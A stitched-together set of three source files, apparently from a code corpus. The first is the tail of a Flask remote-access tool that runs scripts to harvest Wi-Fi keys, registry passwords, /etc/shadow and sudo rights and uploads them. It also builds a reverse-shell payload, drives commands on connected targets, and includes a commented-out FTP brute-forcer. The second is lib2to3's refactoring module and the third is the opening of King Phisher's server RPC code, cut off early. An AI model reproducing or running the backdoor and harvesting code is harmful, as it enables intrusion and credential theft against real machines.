echo. >> %temp%\\winenumoutp22.txt
echo ################## netstat -nao >> %temp%\\winenumoutp22.txt
netstat -nao >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## netsh firewall show state >> %temp%\\winenumoutp22.txt
netsh firewall show state >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## netsh firewall show config >> %temp%\\winenumoutp22.txt
netsh firewall show config >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## Shows wireless network information>> %temp%\\winenumoutp22.txt
netsh wlan export profile key=clear
type wi-fi*.xml >> %temp%\\winenumoutp22.txt
del wi-fi*.xml
echo. >> %temp%\\winenumoutp22.txt
echo ################## schtasks /query /fo LIST /v >> %temp%\\winenumoutp22.txt
schtasks /query /fo LIST /v >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## net start >> %temp%\\winenumoutp22.txt
net start >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## DRIVERQUERY >> %temp%\\winenumoutp22.txt
DRIVERQUERY >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## Any mentions of "password" in the registry >> %temp%\\winenumoutp22.txt
reg query HKLM /f password /t REG_SZ /s >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## Checking for services >> %temp%\\winenumoutp22.txt
wmic service get name,displayname,pathname,startmode | findstr /i "auto" >> %temp%\\winenumoutp22.txt
'''
f2 = open("f.bat", "w")
f2.write(f)
f2.close()
f3 = open("f.bat", "r")
for i in f3:
os.system(str(i.replace("\\n", '')))
p = subprocess.Popen("powershell $env:TEMP", shell=False, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p.stdout.read()
output = output.decode()
o = output.replace(" ", "").replace("\\r", "").replace("\\n", "").replace("'", "").replace("Path",
"").replace(
"--", "")
upload_file(o + "\\\winenumoutp22.txt")
os.system("powershell rm f.bat")
else:
f = '''echo "user_name " >>/tmp/enum55.txt
whoami >>/tmp/enum55.txt
echo "hostname " >>/tmp/enum55.txt
hostname >>/tmp/enum55.txt
echo "Kernel information " >>/tmp/enum55.txt
uname -a >>/tmp/enum55.txt
cat /proc/version >>/tmp/enum55.txt
cat /etc/*-release >>/tmp/enum55.txt
echo "user id " >>/tmp/enum55.txt
id >>/tmp/enum55.txt
echo "last logged on user information " >>/tmp/enum55.txt
lastlog >>/tmp/enum55.txt
echo "logs " >>/tmp/enum55.txt
w >>/tmp/enum55.txt
echo "see passwd " >>/tmp/enum55.txt
cat /etc/shadow >>/tmp/enum55.txt
cat /etc/passwd >>/tmp/enum55.txt
echo "grpinfo " >>/tmp/enum55.txt
echo -e "$grpinfo" | grep adm >>/tmp/enum55.txt
echo "installed dpkg " >>/tmp/enum55.txt
dpkg -l >>/tmp/enum55.txt
echo "files that has sudo " >>/tmp/enum55.txt
echo "" | sudo -S -l -k >>/tmp/enum55.txt
echo "directory permissions " >>/tmp/enum55.txt
ls -ahl /home/ >>/tmp/enum55.txt
ls -ahl >>/tmp/enum55.txt
echo "cronjub enum " >>/tmp/enum55.txt
ls -la /etc/cron* >>/tmp/enum55.txt
cat /etc/crontab >>/tmp/enum55.txt
echo "service enum " >>/tmp/enum55.txt
systemctl list-timers --all >>/tmp/enum55.txt
systemctl list-timers |head -n -1 >>/tmp/enum55.txt
echo "network enum " >>/tmp/enum55.txt
/sbin/ifconfig -a >>/tmp/enum55.txt
/sbin/ip a >>/tmp/enum55.txt
arp -a >>/tmp/enum55.txt
ip n >>/tmp/enum55.txt
grep "nameserver" /etc/resolv.conf >>/tmp/enum55.txt
systemd-resolve --status 2 >>/tmp/enum55.txt
netstat -ntpl >>/tmp/enum55.txt
ss -t -l -n >>/tmp/enum55.txt
netstat -nupl >>/tmp/enum55.txt
ss -u -l -n >>/tmp/enum55.txt
echo "running proces " >>/tmp/enum55.txt
ps aux >>/tmp/enum55.txt
echo "database enum " >>/tmp/enum55.txt
mysql --version >>/tmp/enum55.txt
mysqladmin -uroot -proot version >>/tmp/enum55.txt
mysqladmin -uroot version >>/tmp/enum55.txt
psql -V >>/tmp/enum55.txt
echo "apache enum " >>/tmp/enum55.txt
apache2 -v >>/tmp/enum55.txt
grep -i "user\|group" /etc/apache2/envvars >>/tmp/enum55.txt
echo "files enum " >>/tmp/enum55.txt
find / -name ".*" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; >>/tmp/enum55.txt'''
f2 = open("f.sh", "w")
f2.write(f)
f2.close()
f3 = open("f.sh", "r")
for i in f3:
os.system(str(i.replace("\\n", '')))
upload_file("/tmp/enum55.txt")
os.system("rm f.sh")
else:
try:
if "nt" in os.name:
command = "powershell " + command
else:
command = command
echut = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = echut.stdout.read() + echut.stderr.read()
output = output.decode()
reliable_send(output)
except:
reliable_send("error")
#
"""
payload_name = "payload.py"
if ("http" not in port):
print("h")
# ip = str(self.lineEdit.text())
port = int(port)
payload = payload_strick + f"""
while True:
try:
host = "{ip}"
port = {port}
connt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connt.connect((host, port))
shell_do()
except:
pass
"""
# payload=payload.replace('\r','\\r').replace('\n','\\n')
save = open(payload_name, 'w')
save.write(payload)
save.close()
print("done")
else:
# ip = str(self.lineEdit.text())
# port = int(port)
payload = payload_strick + f"""
from urllib.request import Request, urlopen
while True:
try:
host = "{ip}"
req1 = Request("{port}")
port= int(urlopen(req1).read().decode().replace("\\n",""))
connt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connt.connect((host, port))
shell_do()
except:
pass
"""
save = open(payload_name, 'w')
save.write(payload)
save.close()
print("done")
path = "payload/back_dor2s.py"
return send_file(path, as_attachment=True)
else:
return paylod_go_ha_sh()
# return render_template("payload.html")
@app.route('/payload.html', methods =["GET", "POST"])
def paylod_go_ha_sh():
tarid: str = str(request.form.get('tids'))
comand: str = str(request.form.get('commands'))
print(comand)
if (tarid.lower() == "all"):
print(tarid)
scmall=""
for i in rv.allAddress:
rv.GUI_accept_con2(rv.allAddress.index(i))
scmall+=str("target" + i[0] + ":" + str(i[1]) + "\n" + rv.GUI_communication(comand))+"\n"
return render_template("payload.html", targetcommandout=str(scmall))
else:
print(tarid)
tip = tarid[0:tarid.find(':')]
tport = tarid[tarid.find(':'):].replace(":", "")
targ = (tip, int(tport))
rv.GUI_accept_con2(rv.allAddress.index(targ))
return render_template("payload.html", targetcommandout=str(("target" + targ[0] + ":" + str(targ[1]) + "\n" + rv.GUI_communication(comand))))
# return render_template("payload.html",targetcommandout="his")
# @app.route('/brutefroce.html')
# def brutefroce():
# return render_template("brutefroce.html")
# global passwords,ftp
# Helper used by the (commented-out) brute-force route below; it requires a
# `passwords` argument, so it is not registered as a Flask route itself.
def service_brute_goh(passwords):
def inner():
for password in passwords:
ftb = ftp.connect_ftp(password)
if ftb != None:
print(f"{ftp.GREEN}[+] Found credentials: \n")
print(f"{ftb} {ftp.RESET}")
yield str('[+] Found credentials: \n' + ftb) + '<br/>\n'
break
            yield str("trying pass: " + password) + '<br/>\n'
return Response(inner(), mimetype='text/html')
# @app.route('/brutefroce.html', methods =["GET", "POST"])
# def brutefroce_go():
# service: str = str(request.form.get('servicetype'))
# username: str = str(request.form.get('username'))
# target: str = str(request.form.get('target'))
# file = request.files['file']
# if file and allowed_file(file.filename):
# filename = secure_filename(file.filename)
# file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
# filepas=str(os.path.join(app.config['UPLOAD_FOLDER'], filename))
# print(filepas)
# if(service=="ftp"):
# port = 21
# passwords = open(filepas).read().split("\n")
# print("[+] Passwords to try:", len(passwords))
# ftp = ftp_brute(target, username, port)
# try:
# return service_brute_goh(passwords)
# except:
# pass
# elif(service=="ssh"):
# pass
# return render_template('brutefroce.html')
# return render_template("brutefroce.html")
@app.route('/index.html')
def index2():
return render_template("index2.html")
@app.route('/test.html')
def test():
return render_template("test.html")
def mainW():
app.run()
if __name__ == '__main__':
mainW()
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
from __future__ import with_statement
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import os
import sys
import logging
import operator
import collections
import io
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_utils as bu
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fixer_dir = os.path.dirname(pkg.__file__)
fix_names = []
for name in sorted(os.listdir(fixer_dir)):
if name.startswith("fix_") and name.endswith(".py"):
if remove_prefix:
name = name[4:]
fix_names.append(name[:-3])
return fix_names
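# Hedged example: for the standard fixer package this returns entries such as
#   get_all_fix_names("lib2to3.fixes") -> ["apply", "basestring", "buffer", ...]
# (pass remove_prefix=False to keep the "fix_" prefix on each name).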
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
        # NodePatterns must either have no type and no content
        # or a type and content -- so they don't get any farther.
        # Always return leaves.
if pat.type is None:
raise _EveryNode
return set([pat.type])
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
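# For example (editor's note), get_fixers_from_package("lib2to3.fixes") returns
# fully qualified names such as "lib2to3.fixes.fix_print" and
# "lib2to3.fixes.fix_apply", suitable for passing to RefactoringTool below.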
def _identity(obj):
return obj
if sys.version_info < (3, 0):
import codecs
_open_with_encoding = codecs.open
# codecs.open doesn't translate newlines sadly.
def _from_system_newlines(input):
return input.replace("\r\n", "\n")
def _to_system_newlines(input):
if os.linesep != "\n":
return input.replace("\n", os.linesep)
else:
return input
else:
_open_with_encoding = open
_from_system_newlines = _identity
_to_system_newlines = _identity
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset((token.NEWLINE, tokenize.NL, token.COMMENT))
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
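# Illustrative behaviour (editor's note): the scan above only looks at a leading
# docstring plus __future__ imports, so for example
#     _detect_future_features('"""doc"""\nfrom __future__ import print_function\n')
# yields frozenset({'print_function'}), while
#     _detect_future_features('import os\nfrom __future__ import division\n')
# yields frozenset() because the scan stops at the first ordinary statement.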
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: a dict with configuration options.
explicit: a list of fixers to run even if they are marked as explicit
(explicit fixers are not run unless requested).
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
if self.options["print_function"]:
self.grammar = pygram.python_grammar_no_print_statement
else:
self.grammar = pygram.python_grammar
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name))
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping implicit fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if not name.startswith(".") and \
os.path.splitext(name)[1].endswith("py"):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except IOError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with _open_with_encoding(filename, "r", encoding=encoding) as f:
return _from_system_newlines(f.read()), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if tree and tree.was_changed:
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if tree and tree.was_changed:
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
#sort by depth; apply fixers from bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
#some fixers(eg fix_imports) must be applied
#with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except AssertionError:
# this node has been cut off from a
# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored, and there are changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
f = _open_with_encoding(filename, "w", encoding=encoding)
except os.error as err:
self.log_error("Can't create %s: %s", filename, err)
return
try:
f.write(_to_system_newlines(new_text))
except os.error as err:
self.log_error("Can't write %s: %s", filename, err)
finally:
f.close()
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
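# --- Illustrative usage sketch (editor's addition, not part of upstream
# lib2to3.refactor). A standalone script, assuming the standard
# "lib2to3.fixes" fixer package, would drive RefactoringTool roughly like so:
#
#     from lib2to3.refactor import RefactoringTool, get_fixers_from_package
#     tool = RefactoringTool(get_fixers_from_package("lib2to3.fixes"))
#     tree = tool.refactor_string("print 'hello'\n", "<example>")
#     print(str(tree))          # -> print('hello')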
|
server_rpc.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/server/server_rpc.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import collections
import datetime
import functools
import logging
import threading
from king_phisher import errors
from king_phisher import geoip
from king_phisher import ipaddress
from king_phisher import version
from king_phisher.constants import ConnectionErrorReason
from king_phisher.server import graphql
from king_phisher.server import signals
from king_phisher.server.database import manager as db_manager
from king_phisher.server.database import models as db_models
import advancedhttpserver
import pyotp
CONFIG_READABLE = (
'beef.hook_url',
'server.address.host',
'server.address.port',
'server.require_id',
'server.secret_id',
'server.tracking_image',
'server.web_root'
)
"""Configuration options that can be accessed by the client."""
CONFIG_WRITEABLE = ('beef.hook_url',)
"""Configuration options that can be changed by the client at run time."""
RPC_AUTH_HEADER = 'X-RPC-Auth'
"""The header which contains the RPC authorization / session token."""
VIEW_ROW_COUNT = 50
"""The default number of rows to return when one of the /view methods are called."""
database_tables = db_models.database_tables
database_table_objects = db_models.database_table_objects
rpc_logger = logging.getLogger('KingPhisher.Server.RPC')
def register_rpc(path, database_access=False, log_call=False):
"""
Register an RPC function with the HTTP request handler. This allows the
method to be remotely invoked using King Phisher's standard RPC interface.
If *database_access* is specified, a SQLAlchemy session will be passed as
the second argument, after the standard
:py:class:`~advancedhttpserver.RequestHandler` instance.
:param str path: The path for the RPC function.
:param bool database_access: Whether or not the function requires database access.
:param bool log_call: Whether or not to log the arguments which the function is called with.
"""
path = '^' + path + '$'
def decorator(function):
@functools.wraps(function)
def wrapper(handler_instance, *args, **kwargs):
if log_call and rpc_logger.isEnabledFor(logging.DEBUG):
args_repr = ', '.join(map(repr, args))
if kwargs:
for key, value in sorted(kwargs.items()):
args_repr += ", {0}={1!r}".format(key, value)
msg = "calling RPC method {0}({1})".format(function.__name__, args_repr)
if getattr(handler_instance, 'rpc_session', False):
msg = handler_instance.rpc_session.user + ' is ' + msg
rpc_logger.debug(msg)
signals.rpc_method_call.send(path[1:-1], request_handler=handler_instance, args=args, kwargs=kwargs)
if database_access:
session = db_manager.Session()
try:
result = function(handler_instance, session, *args, **kwargs)
finally:
session.close()
else:
result = function(handler_instance, *args, **kwargs)
signals.rpc_method_called.send(path[1:-1], request_handler=handler_instance, args=args, kwargs=kwargs, retval=result)
return result
advancedhttpserver.RegisterPath(path, is_rpc=True)(wrapper)
return wrapper
return decorator
@register_rpc('/ping', log_call=True)
def rpc_ping(handler):
"""
